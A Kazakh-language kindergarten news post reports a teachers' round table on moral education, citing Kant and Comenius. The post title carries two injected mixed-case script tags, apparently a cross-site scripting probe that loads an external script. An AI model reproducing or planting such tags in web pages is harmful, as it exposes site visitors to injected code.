«Адамгершіліксіз білім – бір қанатты құспен тең»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.02.2019

  Жылдық жоспарға сай  аудандық өзін-өзі тану пәнінің онкүндігі  бойынша «Адамгершіліксіз білім – бір қанатты құспен тең» тақырыбында  дөңгелек үстел өткізілді . Дөңгелек үстелді өзін-өзі тану оқытушысы, балабақша әдіскері И. А. Тяглая  ұйымдастырды.  Дөңгелек үстелге балабақша педагогтары қатысты.

  Жұмыс барысында педагогтарға педагогтың  адамгершілік қаситетін талдады.

  Педагогтардың балаларды тәрбиелеудегі рухани-адамгершілік қасиетінің мәні туралы ойларын ортаға салып пікірлесті.  И. Канттың  айтуы бойынша әр педагогтың "Адамгершілік мінезде болуы тиіс" деген тұжырымға келді .

  Отырысқа қатысушылар рухани - адамгершілік қасиет  өздігінен білім алу басты мәселелердің бірі деген шешімге келді. Педагогтар Яна Амос Каменскийдің  «Кімде-кім аз білсе, үйреткені де аз болады»  сөздерінде растау тапты.

   «Адам баласы бір-бірінен ақыл, ғылым, ар, мінез нәрселерімен озады»   деген нақыл сөзімен дөңгелек үстел аяқталды.

Просмотров: 504


Пікір қосу



Деректерді қолтаңбаға қосу
Текст